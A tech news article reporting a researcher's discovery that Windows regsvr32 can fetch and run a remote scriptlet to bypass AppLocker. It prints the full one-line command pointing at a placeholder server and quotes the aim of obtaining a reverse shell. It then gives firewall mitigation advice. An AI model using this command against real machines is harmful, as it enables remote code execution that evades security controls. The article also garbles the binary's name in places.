A security researcher has found a vulnerability in Windows that could allow hackers to install malicious software on a computer without the user’s knowledge. Casey Smith, a researcher from Colorado, discovered that regsrvr32 (regsrvr64 in 64-bit versions) – a whitelisted function in Windows, dating back to Windows 7 – can be manipulated to bypass the AppLocker security restrictions on installing programs.
“So, I have been working this out the last few days. I was trying solve a particular problem,” Smith wrote on his blog. “I needed a reverse shell on workstation locked down by AppLocker executable and script rules enforced.”
Smith’s solution to the problem looked like this:
regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll
Effectively, he used a URL as a script, a function of regsvr that was not commonly known to exist.
“The amazing thing here is that regsvr32 is already proxy aware, uses TLS, follows redirects, etc… And… You guessed a signed, default MS binary. So, all you need to do is host your .sct file at a location you control,” added Smith.
The crux of Smith’s discovery is, by using regsrvr32/regsrvr64, someone can remotely execute code on a Windows machine without triggering AppLocker. While Microsoft is yet to patch the flaw, anyone concern about it can disable regsvr in either Windows Firewall or their own third-party firewall.
According to a new report, the GeForce RTX 5090 GPU will be very expensive. It…
A new AMD processor in the form of an engineering model has been leaked in…
SK Hynix has claimed to be the first company to mass-produce 321-layer NAND memory chips.…
SOUNDS GREAT – Full stereo sound (12W peak power) gives your setup a booming audio…
Special Edition Yoshi design Ergonomic controller shape with Nintendo Switch button layout Detachable 10ft (3m)…
Fluid Motion: These flight rudder pedals are smooth and accurate that enable precise control over…